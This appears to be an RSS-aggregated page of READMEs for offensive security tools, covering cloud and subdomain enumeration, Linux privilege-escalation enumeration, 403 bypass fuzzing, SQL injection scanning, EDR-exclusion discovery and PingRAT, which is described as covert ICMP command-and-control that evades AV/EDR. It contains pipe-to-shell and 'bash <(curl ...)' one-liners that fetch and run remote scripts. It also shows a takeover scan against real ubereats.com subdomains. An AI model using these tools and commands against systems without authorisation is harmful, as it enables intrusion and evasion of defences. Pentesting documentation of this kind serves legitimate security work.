FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Secator - The Pentester'S Swiss Knife

By: Zion3R


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Complexity from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

Name Description Category
httpx Fast HTTP prober. http
cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
gospider Fast web spider written in Go. http/crawler
katana Next-generation crawling and spidering framework. http/crawler
dirsearch Web path discovery. http/fuzzer
feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
ffuf Fast web fuzzer written in Go. http/fuzzer
h8mail Email OSINT and breach hunting tool. osint
dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
subfinder Fast subdomain finder. recon/dns
fping Find alive hosts on local networks. recon/ip
mapcidr Expand CIDR ranges into IPs. recon/ip
naabu Fast port discovery tool. recon/port
maigret Hunt for user accounts across many websites. recon/user
gf A wrapper around grep to avoid typing common patterns. tagger
grype A vulnerability scanner for container images and filesystems. vuln/code
dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
msfconsole CLI to access and work with the Metasploit Framework. vuln/http
wpscan WordPress Security Scanner vuln/multi
nmap Vulnerability scanner using NSE scripts. vuln/multi
nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
searchsploit Exploit searcher. exploit/search

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

Installing addons

secator comes installed with the minimum amount of dependencies.

There are several addons available for secator:

worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

and more... to list all tasks / workflows / scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



CloudBrute - Awesome Cloud Enumerator

By: Zion3R


A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available. here


Motivation

we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:

  • separated wordlists
  • lack of proper concurrency
  • lack of supporting all major cloud providers
  • require authentication or keys or cloud CLI access
  • outdated endpoints and regions
  • Incorrect file storage detection
  • lack support for proxies (useful for bypassing region restrictions)
  • lack support for user agent randomization (useful for bypassing rare restrictions)
  • hard to use, poorly configured

Features

  • Cloud detection (IPINFO API and Source Code)
  • Supports all major providers
  • Black-Box (unauthenticated)
  • Fast (concurrent)
  • Modular and easily customizable
  • Cross Platform (windows, linux, mac)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Supported Cloud Providers

Microsoft: - Storage - Apps

Amazon: - Storage - Apps

Google: - Storage - Apps

DigitalOcean: - storage

Vultr: - Storage

Linode: - Storage

Alibaba: - Storage

Version

1.0.0

Usage

Just download the latest release for your operation system and follow the usage.

To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

It looks like this

providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

After setting up your API key, you are ready to use CloudBrute.

 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•
β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•β•β•β•β•
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:

-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config


for example

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments

If a cloud provider not detected or want force searching on a specific provider, you can use -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Dev

  • Clone the repo
  • go build -o CloudBrute main.go
  • go test internal

in action

How to contribute

  • Add a module or fix something and then pull request.
  • Share it with whomever you believe can use it.
  • Do the extra work and share your findings with community β™₯

FAQ

How to make the best out of this tool?

Read the usage.

I get errors; what should I do?

Make sure you read the usage correctly, and if you think you found a bug open an issue.

When I use proxies, I get too many errors, or it's too slow?

It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

too fast or too slow ?

change -T (timeout) option to get best results for your run.

Credits

Inspired by every single repo listed here .



Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

By: Zion3R


Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


Features

Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)

A fast and comprehensive tool for organizational network scanning (6)

A fast and comprehensive tool for organizational network scanning (7)

  • Virtual hostname enumeration
  • Reverse DNS lookup

A fast and comprehensive tool for organizational network scanning (8)

  • Detects wildcard subdomains (for bruteforcing)

A fast and comprehensive tool for organizational network scanning (9)

  • Basic TCP port scanning
  • Subdomains are accepted as input

A fast and comprehensive tool for organizational network scanning (10)

  • Export results to JSON file

A fast and comprehensive tool for organizational network scanning (11)

A few features are work in progress. See Planned features for more details.

The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

Installation

You can build this repo from source- - Clone the repository

git clone git@github.com:pptx704/domainim
  • Build the binary
nimble build
  • Run the binary
./domainim <domain> [--ports=<ports>]

Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

Usage

./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
  • <domain> is the domain to be enumerated. It can be a subdomain as well.
  • -- ports | -p is a string speicification of the ports to be scanned. It can be one of the following-
  • all - Scan all ports (1-65535)
  • none - Skip port scanning (default)
  • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
  • single value - Scan a single port. i.e. 80 scans port 80
  • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
  • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
  • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
  • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
  • a.b.c.d - Use DNS server at a.b.c.d on port 53
  • a.b.c.d#n - Use DNS server at a.b.c.d on port e
  • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
  • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.
  • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

Examples - ./domainim nmap.org --ports=all - ./domainim google.com --ports=none --dns=8.8.8.8#53 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json - ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

The help menu can be accessed using ./domainim --help or ./domainim -h.

Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)

Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`

Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json

The JSON schema for the results is as follows-

[
{
"subdomain": string,
"data": [
"ipv4": string,
"vhosts": [string],
"reverse_dns": string,
"ports": [int]
]
}
]

Example json for nmap.org can be found here.

Contributing

Contributions are welcome. Feel free to open a pull request or an issue.

Planned Features

  • [x] TCP port scanning
  • [ ] UDP port scanning support
  • [ ] Resolve AAAA records (IPv6)
  • [x] Custom DNS server
  • [x] Add bruteforcing subdomains using a wordlist
  • [ ] Force bruteforcing (even if wildcard subdomain is found)
  • [ ] Add more engines for subdomain enumeration
  • [x] File output (JSON)
  • [ ] Multiple domain enumeration
  • [ ] Dir and File busting

Others

  • [x] Update verbose output when encountering errors (v0.2.0)
  • [x] Show progress bar for longer operations
  • [ ] Add individual port scan progress bar
  • [ ] Add tests
  • [ ] Add comments and docstrings

Additional Notes

This project is still in its early stages. There are several limitations I am aware of.

The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).

The port scanner has only ping response time + 750ms timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

It might seem that the way vhostnames are printed, it just brings repeition on the table.

A fast and comprehensive tool for organizational network scanning (12)

Printing as the following might've been better-

ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
↳ 45.33.49.119
↳ Reverse DNS: ack.nmap.org.

But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.

A fast and comprehensive tool for organizational network scanning (13)

DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t flag.

One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.

For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.

Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org but something.ack.nmap.org might be. I can search for all subdomains of nmap.org but that defeats the purpose of having a subdomains as an input.

License

MIT License. See LICENSE for full text.



Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

By: Zion3R


First, a couple of useful oneliners ;)

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


linux-smart-enumeration

Linux enumeration tools for pentesting and CTFs

This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample


Examples

Direct execution oneliners

bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

By: Zion3R


The original 403fuzzer.py :)

Fuzz 401/403ing endpoints for bypasses

This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.

It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.

I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

You can now feed it raw HTTP requests that you save to a file from Burp.

Follow me on twitter! @intrudir


Usage

usage: bypassfuzzer.py -h

Specifying a request to test

Best method: Feed it a raw HTTP request from Burp!

Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

python3 bypassfuzzer.py -r request.txt

Using other flags

Specify a URL

python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

Specify cookies to use in requests:
some examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"

Specify a method/verb and body data to send

bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>

Specify -H "header: value" for each additional header you'd like to add:

bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

Smart filter feature!

Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

Repeats are changeable in the code until I add an option to specify it in flag

NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart

Specify a proxy to use

Useful if you wanna proxy through Burp

bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

Skip sending header payloads or url payloads

# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers

# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls

Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638

TODO

  • [x] Automatically check other methods/verbs for bypass
  • [x] absolute domain attack
  • [ ] Add HTTP/2 support
  • [ ] Looking for ideas. Ping me on twitter! @intrudir


PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

By: Zion3R


PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

Features:

  • Uses ICMP for Command and Control
  • Undetectable by most AV/EDR solutions
  • Written in Go

Installation:

Download the binaries

or build the binaries and you are ready to go:

$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go

Usage:

Server:

./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)

Client:

./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)



SQLMC - Check All Urls Of A Domain For SQL Injections

By: Zion3R


SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

Features

  • Scans a domain for SQL injection vulnerabilities
  • Crawls the given URL up to a specified depth
  • Checks each link for SQL injection vulnerabilities
  • Reports vulnerabilities along with server information and depth

Installation

  1. Install the required dependencies: bash pip3 install sqlmc

Usage

Run sqlmc with the following command-line arguments:

  • -u, --url: The URL to scan (required)
  • -d, --depth: The depth to scan (required)
  • -o, --output: The output file to save the results

Example usage:

sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

The tool will then perform the scan and display the results.

ToDo

  • Check for multiple GET params
  • Better injection checker trigger methods

Credits

License

This project is licensed under the GNU Affero General Public License v3.0.



BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR

By: Zion3R


BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.

How it works?

BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.

Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.


Original idea?

Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.

Requirements

Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.

The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.

EDR Demo

https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4



Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud

By: Zion3R


Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

Currently enumerates the following:

Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)

Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps

Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps


See it in action in Codingo's video demo here.


Usage

Setup

Several non-standard libaries are required to support threaded HTTP requests and dns lookups. You'll need to install the requirements as follows:

pip3 install -r ./requirements.txt

Running

